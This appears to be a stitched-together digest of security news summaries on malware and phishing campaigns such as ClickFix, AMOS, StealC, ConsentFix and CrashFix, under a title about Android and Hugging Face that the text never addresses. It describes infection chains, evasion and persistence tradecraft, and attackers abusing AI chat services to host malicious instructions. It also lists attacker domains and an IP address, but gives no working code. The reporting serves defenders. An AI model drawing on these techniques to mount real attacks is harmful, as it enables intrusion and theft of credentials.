Android Malware Campaign Abuses Hugging Face Platform

A new variant of the BeaverTail malware has been linked to the Lazarus Group, targeting cryptocurrency traders, developers, and retail employees. The malware, which functions as both an information stealer and a loader, has evolved to include advanced obfuscation techniques and diverse delivery methods. It has been observed using layered Base64 and XOR encoding to conceal its behavior and has been distributed through trojanized npm packages, fake job interview platforms, and ClickFix lures. The malware's capabilities now include keylogging, screenshot capture, and clipboard monitoring, aimed at stealing cryptocurrency wallet data and credentials. Additionally, BeaverTail has been merged with another DPRK-linked strain known as OtterCookie, enhancing its browser profile enumeration and remote access capabilities.

A malware campaign involving seven npm packages has been identified, operated by the threat actor dino_reborn. The packages use cloaking tools, anti-analysis controls, and fake crypto-exchange CAPTCHAs to redirect victims to malicious URLs. The packages were taken down following security requests. The campaign employed detailed device fingerprinting and dynamic redirects through the Adspect API. The malware disabled user interactions and detected security researcher tools, displaying a white page to researchers while redirecting victims to malicious sites. The packages involved are signals-embed, dsidospsodlks, applicationooks21, application-phskck, integrator-filescrypt2025, integrator-2829, and integrator-2830.

A sophisticated malware campaign, codenamed GPUGate, targets IT and software development companies in Western Europe, with recent expansions to macOS users. The campaign leverages Google Ads, SEO poisoning, and fake GitHub commits to deliver malware, including the Atomic macOS Stealer (AMOS) and Odyssey. The attack began in December 2024 and uses a 128 MB Microsoft Software Installer (MSI) to evade detection. The malware employs GPU-gated decryption and various techniques to avoid analysis and detection. The end goal is information theft and delivery of secondary payloads. The threat actors have native Russian language proficiency and use a cross-platform approach. The campaign has expanded to target macOS users through fake Homebrew, LogMeIn, and TradingView platforms. These platforms impersonate popular tools and use SEO poisoning to distribute the Atomic Stealer malware and Odyssey. The threat actors use multiple GitHub usernames to evade takedowns and deploy malware via Terminal commands. Similar tactics have been observed in previous campaigns using malicious Google Ads and public GitHub repositories. The AMOS malware now includes a backdoor component for persistent, stealthy access to compromised systems. The campaign impersonates over 100 software solutions, including 1Password, Dropbox, Confluence, Robinhood, Fidelity, Notion, Gemini, Audacity, Adobe After Effects, Thunderbird, and SentinelOne. The fake GitHub pages were created on September 16, 2025, and were immediately submitted for takedown. The campaign has been active since at least April 2023, with previous similar campaigns observed in July 2025. A new AMOS infostealer campaign abuses Google search ads to lure users into Grok and ChatGPT conversations that lead to installing the AMOS malware on macOS. The campaign was first spotted by researchers at Kaspersky, with a more detailed report by Huntress. The ClickFix attack begins with victims searching for macOS-related terms, leading to malicious instructions in AI chats. The malicious instructions are hosted on legitimate LLM platforms and contain commands to install the malware. The base64-encoded URL decodes into a bash script that loads a fake password prompt dialog. The script validates, stores, and uses the provided password to execute privileged commands, including downloading and executing the AMOS infostealer. AMOS was first documented in April 2023 and is a malware-as-a-service (MaaS) operation targeting macOS systems exclusively. AMOS added a backdoor module earlier this year, allowing operators to execute commands, log keystrokes, and drop additional payloads. AMOS is dropped as a hidden file and scans for cryptocurrency wallets, browser data, macOS Keychain data, and files on the filesystem. Persistence is achieved via a LaunchDaemon running a hidden AppleScript that restarts the malware if terminated. Users are advised to be vigilant and avoid executing commands they found online, especially if they don't fully understand what they do. Kaspersky noted that asking ChatGPT if the provided instructions are safe reveals they are not.

A new infostealer malware named Shamos is targeting Mac devices through ClickFix attacks. The malware, developed by the COOKIE SPIDER group, steals data and credentials from web browsers, Keychain, Apple Notes, and cryptocurrency wallets. The attacks use malvertising and fake GitHub repositories to lure victims into executing shell commands that download and install the malware. Since June 2025, Shamos has attempted infections in over three hundred environments monitored by CrowdStrike. The malware uses anti-VM commands, AppleScript for reconnaissance, and creates persistence through a Plist file. Users are advised to avoid executing unknown commands and to seek help from trusted sources. A new variant of the MacSync stealer, related to Shamos, is distributed through a digitally signed, notarized Swift application, bypassing macOS Gatekeeper checks. This variant uses evasion techniques such as inflating the DMG file with decoy PDFs and performing internet connectivity checks. The malware runs largely in memory and cleans up temporary files after execution, leaving minimal traces behind. The associated developer certificate has been revoked. The latest variant of MacSync stealer is delivered through a digitally signed, notarized Swift application masquerading as a messaging app installer. The disk image file named 'zk-call-messenger-installer-3.9.2-lts.dmg' is hosted on 'zkcall[.]net/download'. The installer displays instructions prompting users to right-click and open the app to sidestep Gatekeeper safeguards. The Swift-based dropper performs a series of checks before downloading and executing an encoded script through a helper component. The curl command used to retrieve the payload shows clear deviations from earlier variants, using flags like -fL and -sS, and additional options like --noproxy. The DMG file is unusually large at 25.5 MB, inflated with unrelated PDF documents. The Base64-encoded payload corresponds to MacSync, a rebranded version of Mac.c that first emerged in April 2025. MacSync comes fitted with a fully-featured Go-based agent that enables remote command and control capabilities.

The ClickFix malware campaign has evolved to include multi-OS support and video tutorials that guide victims through the self-infection process. The campaign, which uses fake Cloudflare CAPTCHA pages and malicious PowerShell scripts, has been observed deploying various payloads, including information stealers and backdoors. The FileFix attack, a variant of the ClickFix family, impersonates Meta account suspension warnings to trick users into installing the StealC infostealer malware. The campaign has evolved over two weeks with different payloads, domains, and lures, indicating an attacker testing and adapting their infrastructure. The FileFix technique, created by red team researcher mr. d0x, uses the address bar in File Explorer to execute malicious commands. The campaign employs steganography to hide a second-stage PowerShell script and encrypted executables inside a JPG image, which is believed to be AI-generated. The StealC malware targets credentials from various applications, cryptocurrency wallets, and cloud services, and can take screenshots of the active desktop. The FileFix attack uses a multilingual phishing site to trick users into executing a malicious command via the File Explorer address bar. The attack leverages Bitbucket to host the malicious components, abusing a legitimate source code hosting platform to bypass detection. The attack involves a multi-stage PowerShell script that downloads an image, decodes it into the next-stage payload, and runs a Go-based loader to launch StealC. The attack uses advanced obfuscation techniques, including junk code and fragmentation, to hinder analysis efforts. The FileFix attack is more likely to be detected by security products due to the payload being executed by the web browser used by the victim. The FileFix attack demonstrates significant investment in tradecraft, with carefully engineered phishing infrastructure, payload delivery, and supporting elements to maximize evasion and impact. The FileFix attack is more sophisticated than ClickFix, as it abuses a widely used browser feature instead of the Run dialog or Terminal app. The FileFix attack has been observed in a campaign that uses a combination of fake support portals, Cloudflare CAPTCHA error pages, and clipboard hijacking to socially engineer victims into running malicious PowerShell code. The FileFix attack has been observed using an AutoHotkey (AHK) script to profile the compromised host and deliver additional payloads, including AnyDesk, TeamViewer, information stealers, and clipper malware. The FileFix attack has been observed using an MSHTA command pointing to a lookalike Google domain to retrieve and execute a remote malicious script. The MetaStealer attack, a variant of the ClickFix family, uses a fake Cloudflare Turnstile lure and an MSI package disguised as a PDF to deploy the MetaStealer infostealer malware. The attack involves a multi-stage infection chain that includes a DLL sideloading technique using a legitimate SentinelOne executable. The MetaStealer attack targets crypto wallets and other sensitive information, using a combination of social engineering and technical evasion techniques to deploy malware. Recently, threat actors have been abusing the decades-old Finger protocol to retrieve and execute remote commands on Windows devices. The Finger protocol is used to deliver commands that create a random-named path, download a zip archive disguised as a PDF, and extract a Python malware package. The Python program is executed using pythonw.exe __init__.py, and a callback is made to the attacker's server to confirm execution. A related batch file indicates that the Python package is an infostealer. Another campaign uses the Finger protocol to retrieve and run commands that look for malware research tools and exit if found. If no malware analysis tools are found, the commands download a zip archive disguised as PDF files and extract the NetSupport Manager RAT package. The commands configure a scheduled task to launch the remote access malware when the user logs in. The Finger protocol abuse appears to be carried out by a single threat actor conducting ClickFix attacks. A new EVALUSION ClickFix campaign has been discovered, delivering Amatera Stealer and NetSupport RAT. Amatera Stealer, an evolution of ACR Stealer, is available under a malware-as-a-service (MaaS) model and targets crypto-wallets, browsers, messaging applications, FTP clients, and email services. It employs advanced evasion techniques such as WoW64 SysCalls and is packed using PureCrypter. The stealer is injected into the MSBuild.exe process to harvest sensitive data and contact an external server to execute a PowerShell command to fetch and run NetSupport RAT. The campaign also involves phishing attacks using various malware families and phishing kits named Cephas and Tycoon 2FA. Tycoon 2FA is a phishing kit that bypasses multi-factor authentication (MFA) and authentication apps by intercepting usernames, passwords, session cookies, and MFA flows in real-time. It has been used in over 64,000 attacks this year, primarily targeting Microsoft 365 and Gmail. Tycoon 2FA includes anti-detection layers and can lead to total session takeover, allowing attackers to move laterally into various enterprise systems. Legacy MFA methods are vulnerable to Tycoon 2FA, and phishing-proof MFA solutions like Token Ring and Token BioStick are recommended to prevent such attacks. A new operation embedding StealC V2 inside Blender project files has been observed targeting victims for at least six months. The attackers placed manipulated .blend files on platforms such as CGTrader, where users downloaded them as routine 3D assets. When opened with Blender’s Auto Run feature enabled, the files executed concealed Python scripts that launched a multistage infection. The infection chain began with a tampered Rig_Ui.py script embedded inside the .blend file. This script fetched a loader from a remote workers.dev domain, which then downloaded a PowerShell stage and two ZIP archives containing Python-based stealers. Once extracted into the Windows temp directory, the malware created LNK files to secure persistence, then used Pyramid C2 channels to retrieve encrypted payloads. StealC V2, promoted on underground forums since April 2025, has rapidly expanded its feature set. It now targets more than 23 browsers, over 100 plugins, more than 15 desktop wallets, and a range of messaging, VPN and mail clients. Its pricing, from $200 per month to $800 for 6 months, has made it accessible to low-tier cybercriminals seeking ready-to-use tools. ClickFix attack variants have been observed using a realistic-looking Windows Update animation in a full-screen browser page to trick users into executing malicious commands. The new ClickFix variants drop the LummaC2 and Rhadamanthys information stealers. The attack uses steganography to encode the final malware payload inside an image. The process involves multiple stages that use PowerShell code and a .NET assembly (the Stego Loader) responsible for reconstructing the final payload embedded inside a PNG file in an encrypted state. The shellcode holding the infostealer samples is packed using the Donut tool. The Rhadamanthys variant that used the Windows Update lure was first spotted by researchers back in October, before Operation Endgame took down parts of its infrastructure on November 13. A new campaign codenamed JackFix leverages fake adult websites (xHamster, PornHub clones) as its phishing mechanism, likely distributed via malvertising. The JackFix campaign displays highly convincing fake Windows update screens in an attempt to get the victim to run malicious code. The attack heavily leans on obfuscation to conceal ClickFix-related code and blocks users from escaping the full-screen alert by disabling the Escape and F11 buttons, along with F5 and F12 keys. The initial command executed is an MSHTA payload that's launched using the legitimate mshta.exe binary, which contains JavaScript designed to run a PowerShell command to retrieve another PowerShell script from a remote server. The PowerShell script attempts to elevate privileges and creates Microsoft Defender Antivirus exclusions for command-and-control (C2) addresses and paths where the payloads are staged. The PowerShell script serves up to eight different payloads, including Rhadamanthys Stealer, Vidar Stealer 2.0, RedLine Stealer, Amadey, and other unspecified loaders and RATs. The threat actor often changes the URI used to host the first mshta.exe stage and has been observed moving from hosting the second stage on the domain securitysettings.live to xoiiasdpsdoasdpojas.com, although both point to the same IP address 141.98.80.175. An initial access broker tracked as Storm-0249 is abusing endpoint detection and response solutions and trusted Microsoft Windows utilities to load malware, establish communication, and persistence in preparation for ransomware attacks. The threat actor has moved beyond mass phishing and adopted stealthier, more advanced methods that prove effective and difficult for defenders to counter. In one attack analyzed by researchers at cybersecurity company ReliaQuest, Storm-0249 leveraged the SentinelOne EDR components to hide malicious activity. The attack started with ClickFix social engineering that tricked users into pasting and executing curl commands in the Windows Run dialog to download a malicious MSI package with SYSTEM privileges. A malicious PowerShell script is also fetched from a spoofed Microsoft domain, which is piped straight onto the system's memory, never touching the disk and thus evading antivirus detection. The MSI file drops a malicious DLL (SentinelAgentCore.dll), which is placed strategically alongside the pre-existing, legitimate SentinelAgentWorker.exe, which is already installed as part of the victim's SentinelOne EDR. Next, the attacker loads the DLL using the signed SentinelAgentWorker (DLL sideloading), executing the file within the trusted, privileged EDR process and obtaining stealthy persistence that survives operating system updates. Once the attacker gains access, they use the SentinelOne component to collect system identifiers through legitimate Windows utilities like reg.exe and findstr.exe, and to funnel encrypted HTTPS command-and-control (C2) traffic. The compromised systems are profiled using 'MachineGuid,' a unique hardware-based identifier that ransomware groups like LockBit and ALPHV use for binding encryption keys to specific victims. The abuse of trusted, signed EDR processes bypasses nearly all traditional monitoring. The researchers recommend that system administrators rely on behavior-based detection that identifies trusted processes loading unsigned DLLs from non-standard paths. Furthermore, it is helpful to set stricter controls for curl, PowerShell, and LoLBin execution. A new variation of the ClickFix attack dubbed 'ConsentFix' abuses the Azure CLI OAuth app to hijack Microsoft accounts without the need for a password or to bypass multi-factor authentication (MFA) verifications. ConsentFix tricks victims into completing the Azure CLI OAuth flow and steals the resulting authorization code, which is exchanged for full account access. The attack starts with victims landing on a compromised, legitimate website that ranks high on Google Search results. Victims are shown a fake Cloudflare Turnstile CAPTCHA widget that asks for a valid business email address, filtering out bots and non-targets. Victims are instructed to click a 'Sign in' button that opens a legitimate Microsoft URL in a new tab, leading to an Azure login page. The attack completes when victims paste the URL containing the Azure CLI OAuth authorization code into the malicious page, granting attackers access to the Microsoft account via Azure CLI. The attack triggers only once per victim IP address, preventing repeated phishing attempts on the same IP. Defenders are advised to monitor for unusual Azure CLI login activity, such as logins from new IP addresses, and to check for legacy Graph scopes used by attackers to evade detection. Over the past six months, hackers have increasingly relied on the browser-in-the-browser (BitB) method to trick users into providing Facebook account credentials. The BitB phishing technique was developed by security researcher mr.d0x in 2022. In a BitB attack, users who visit attacker-controlled webpages are presented with a fake browser pop-up containing a login form. The pop-up is implemented using an iframe that imitates the authentication interface of legitimate platforms and can be customized with a window title and URL that make the deception more difficult to detect. Recent phishing campaigns targeting Facebook users impersonate law firms claiming copyright infringement, threatening imminent account suspension, or Meta security notifications about unauthorized logins. To avoid detection and to increase the sense of legitimacy, cybercriminals added shortened URLs and fake Meta CAPTCHA pages. In the final stage of the attack, victims are prompted to log in by entering their Facebook credentials in a fake pop-up window. Trellix discovered a high number of phishing pages hosted on legitimate cloud platforms like Netlify and Vercel, which mimic Meta's Privacy Center portal, redirecting users to pages disguised as appeal forms that collected personal information. These campaigns constitute a significant evolution compared to standard Facebook phishing campaigns that security researchers typically observe. The key shift lies in the abuse of trusted infrastructure, utilizing legitimate cloud hosting services like Netlify and Vercel, and URL shorteners to bypass traditional security filters and lend a false sense of security to phishing pages. Most critically, the emergence of the Browser-in-the-Browser (BitB) technique represents a major escalation. By creating a custom-built, fake login pop-up window within the victim's browser, this method capitalizes on user familiarity with authentication flows, making credential theft nearly impossible to detect visually. A new campaign codenamed CrashFix uses a malicious Chrome extension to deliver ModeloRAT via ClickFix-style browser crash lures. The campaign, tracked as KongTuke, uses a malicious Chrome extension named 'NexShield – Advanced Web Guardian' to crash the browser and trick victims into executing commands. The extension masquerades as a legitimate ad blocker and claims to protect users against ads, trackers, malware, and intrusive content. The extension was downloaded at least 5,000 times and is a near-identical clone of uBlock Origin Lite. The extension displays a fake security warning claiming the browser had 'stopped abnormally' and prompts users to run a 'scan'. The scan presents a bogus security alert instructing victims to open the Windows Run dialog and execute a command copied to the clipboard. Executing the command causes the browser to freeze and crash by launching a denial-of-service (DoS) attack that creates new runtime port connections through an infinite loop. The extension transmits a unique ID to an attacker-controlled server, allowing operators to track victims. The extension uses a delayed execution mechanism, triggering malicious behavior 60 minutes after installation and then every 10 minutes. The extension incorporates anti-analysis techniques to disable right-click context menus and prevent the use of developer tools. The CrashFix command employs the legitimate Windows utility, finger.exe, to retrieve and execute the next-stage payload from the attacker's server. The payload is a PowerShell command that retrieves a secondary PowerShell script, which uses multiple layers of Base64 encoding and XOR operations to conceal the next-stage malware. The decrypted blob scans running processes for over 50 analysis tools and virtual machine indicators, ceasing execution if found. The script checks if the machine is domain-joined or standalone and sends an HTTP POST request to the server containing a list of installed antivirus products and a flag indicating the machine type. For domain-joined machines, the campaign deploys ModeloRAT, a fully-featured Python-based Windows RAT that uses RC4 encryption for C2 communications. ModeloRAT sets up persistence using Registry and facilitates the execution of binaries, DLLs, Python scripts, and PowerShell commands. ModeloRAT is equipped to update or terminate itself upon receiving specific commands and implements varied beaconing logic to avoid detection. For standalone workstations, the campaign ends with the C2 server responding with a test payload message, indicating it may still be in the testing phase. KongTuke's CrashFix campaign demonstrates how threat actors evolve their social engineering tactics by impersonating trusted projects and exploiting user frustration. Huntress attributes the analyzed CrashFix attack to a threat actor named 'KongTuke', whose operations have been on the company's radar since early 2025. Based on the recent discovery, the researchers believe that KongTuke is evolving and becoming more interested in enterprise networks, which are more lucrative for cybercriminals. Falling for ClickFix attacks can be prevented by making sure that the effect of any external command executed on the system is well understood. Furthermore, installing browser extensions from trusted publishers or sources should keep you safe from CrashFix attacks or other threats. Users who installed NexShield should perform a full system cleanup, as uninstalling the extension does not remove all payloads, such as ModeloRAT or other malicious scripts. The new campaign abuses SyncAppvPublishingServer.vbs, a signed Visual Basic Script associated with App-V, to retrieve and execute an in-memory loader from an external server using wscript.exe. The campaign uses a fake CAPTCHA verification prompt to trick users into pasting and executing a malicious command on the Windows Run dialog. The obfuscated loader runs checks to ensure that it's not run within sandboxed environments. The loader fetches configuration data from a public Google Calendar (ICS) file, turning a trusted third-party service into a dead drop resolver. The campaign retrieves additional loader stages, including a PowerShell script that functions as an intermediate loader to execute the next stage directly in memory. The resulting script is decrypted, GZip decompressed in memory, and run using Invoke-Expression, ultimately culminating in the execution of a shellcode loader designed to launch Amatera Stealer. The campaign targets enterprise managed systems, as the virtualization solution is built only into Enterprise and Education editions of Windows 10 and Windows 11, along with modern Windows Server versions. The campaign is highly sophisticated and evasive, using in-memory PowerShell code execution and relying on blockchain and popular CDNs to avoid communicating with any infrastructure that's not a legitimate service. The campaign uses a multi-stage attack chain that includes a fake CAPTCHA verification prompt, abuse of SyncAppvPublishingServer.vbs, and retrieval of configuration data from a public Google Calendar file. The campaign is part of the broader fake CAPTCHA ecosystem, which uses trusted web infrastructure as the delivery surface, with Cloudflare-style challenges acting as a conduit for clipboard-driven execution of PowerShell commands, VB Scripts, MSI installers, and browser-native frameworks like Matrix Push C2.